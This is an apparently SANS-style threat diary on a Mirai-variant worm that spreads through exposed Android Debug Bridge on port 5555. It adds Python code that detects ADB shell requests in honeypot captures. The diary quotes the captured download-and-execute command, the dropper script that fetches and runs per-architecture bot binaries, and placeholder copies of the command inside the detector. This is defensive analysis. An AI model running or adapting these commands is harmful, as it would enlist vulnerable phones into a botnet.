Last Updated: 2018-07-10 14:34:35 UTC
by Johannes Ullrich (Version: 1)
Today, I noticed a marked increase in port 5555 scans.
Our honeypot detected odd traffic on this port:
OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95 .215 .62.169/adbs -O -> adbs; sh adbs; rm adbs
Note that our honeypot has a web server listening on this port, so it will not respond to this sequence. As it turns out, this command is directed at the Android Debug Bridge (ADB), an optional feature of the Android operating system. Recently, researchers discovered that this feature appears to be enabled on some Android phones. The feature provides full shell access to the phone, so on a device that exposes it the above command may be executed.
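To show what a sensor on port 5555 is actually looking at, here is an added example (my own code, not from the diary and not from any honeypot project) that parses ADB wire-protocol messages and flags an OPEN request for a "shell:" service that carries a download-and-execute command. It handles both raw TCP payloads (validated against the 24-byte ADB header) and a honeypot's printable rendering like the "OPEN]+shell:" line above. The samples are constructed; the host 198.51.100.7 is a TEST-NET-2 placeholder, not the address seen in the capture.

```python
"""Detect ADB "OPEN shell:" requests in captured port 5555 traffic (added example)."""
import re
import struct

# ADB wire protocol: 24-byte header of six little-endian uint32 fields:
#   command, arg0, arg1, data_length, data_check, magic (= command XOR 0xffffffff)
ADB_HEADER = struct.Struct("<6I")
A_CNXN = 0x4E584E43  # b"CNXN": connection handshake
A_OPEN = 0x4E45504F  # b"OPEN": open a stream; payload names the service, e.g. "shell:..."
CMD_NAMES = {A_CNXN: "CNXN", A_OPEN: "OPEN"}

URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s\"'<>|;&]+")
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b")


def adb_checksum(data: bytes) -> int:
    """ADB's data_check field is the plain byte sum of the payload, mod 2^32."""
    return sum(data) & 0xFFFFFFFF


def parse_adb_message(buf: bytes):
    """Return (command, arg0, arg1, payload) if buf starts with a well-formed ADB message, else None."""
    if len(buf) < ADB_HEADER.size:
        return None
    command, arg0, arg1, length, check, magic = ADB_HEADER.unpack_from(buf)
    if magic != (command ^ 0xFFFFFFFF):
        return None
    payload = buf[ADB_HEADER.size:ADB_HEADER.size + length]
    if len(payload) != length or adb_checksum(payload) != check:
        return None
    return command, arg0, arg1, payload


def build_adb_message(command: int, arg0: int, arg1: int, payload: bytes) -> bytes:
    """Encode an ADB message; used here only to construct sample captures for the detector."""
    header = ADB_HEADER.pack(command, arg0, arg1, len(payload),
                             adb_checksum(payload), command ^ 0xFFFFFFFF)
    return header + payload


def inspect_capture(buf: bytes) -> dict:
    """Classify one captured port-5555 payload: is it ADB, which command, does it open a shell,
    and does the shell command reference downloaders or URLs worth extracting as indicators."""
    result = {"adb": False, "command": None, "service": None,
              "shell": False, "urls": [], "downloader": False}
    parsed = parse_adb_message(buf)
    if parsed is not None:
        command, _, _, payload = parsed
        result["adb"] = True
        result["command"] = CMD_NAMES.get(command, f"0x{command:08x}")
        service = payload.rstrip(b"\x00").decode("latin-1")
    else:
        # Printable rendering from a text log: the OPEN tag, a few header bytes, then the service.
        text = buf.decode("latin-1")
        m = re.search(r"OPEN.{0,24}?(shell:.*)", text, re.S)
        if not m:
            return result
        result["adb"] = True
        result["command"] = "OPEN"
        service = m.group(1)
    result["service"] = service
    if service.startswith("shell:"):
        result["shell"] = True
        result["urls"] = URL_RE.findall(service)
        result["downloader"] = bool(DOWNLOADER_RE.search(service))
    return result


# Constructed samples modelled on the honeypot capture; 198.51.100.7 is a placeholder host.
SAMPLE_SHELL = (b"shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; "
                b"busybox wget http://198.51.100.7/adbs -O -> adbs; sh adbs; rm adbs\x00")
SAMPLE_RAW = build_adb_message(A_OPEN, 1, 0, SAMPLE_SHELL)
SAMPLE_LOGGED = (b"OPEN]+shell:>/sdcard/Download/f && cd /sdcard/Download/; "
                 b"busybox wget http://198.51.100.7/adbs -O -> adbs; sh adbs; rm adbs")
SAMPLE_CNXN = build_adb_message(A_CNXN, 0x01000000, 256 * 1024, b"host::\x00")

if __name__ == "__main__":
    for name, sample in [("raw OPEN", SAMPLE_RAW), ("logged OPEN", SAMPLE_LOGGED),
                         ("raw CNXN", SAMPLE_CNXN), ("not ADB", b"GET / HTTP/1.1\r\n")]:
        print(name, inspect_capture(sample))
```

Feeding each port-5555 payload through inspect_capture() gives a cheap first-stage filter: a CNXN handshake alone is only a probe, while an OPEN for "shell:" with a downloader and a URL is the actual infection attempt, and the extracted URL is the indicator to retrieve and submit for analysis.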
The initial script downloaded:
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
for a in $n
cp /system/bin/sh $a
busybox wget http://$http_server/adb/$a -O -> $a
chmod 777 $a
for a in $n
This script then downloads the actual "worm" binary for each of the listed platforms and attempts to run it. A quick analysis of the file via VirusTotal suggests that this is a Mirai variant.
The initial download URL appears to be hardcoded into the binary. It does not look like the binary turns the infected system into a web server to spread the malware. Instead, it just refers to 126.96.36.199, a data center in Spain (the network has been notified by email).
Shortly after I downloaded the first binary, the web server became unresponsive. I am not sure if this is due to high load or due to the ISP taking down the site. VirusTotal has seen related binaries from this host since at least June. Christian Dietrich uploaded a similar binary on June 21st that was received via the more "traditional" telnet attack Mirai uses.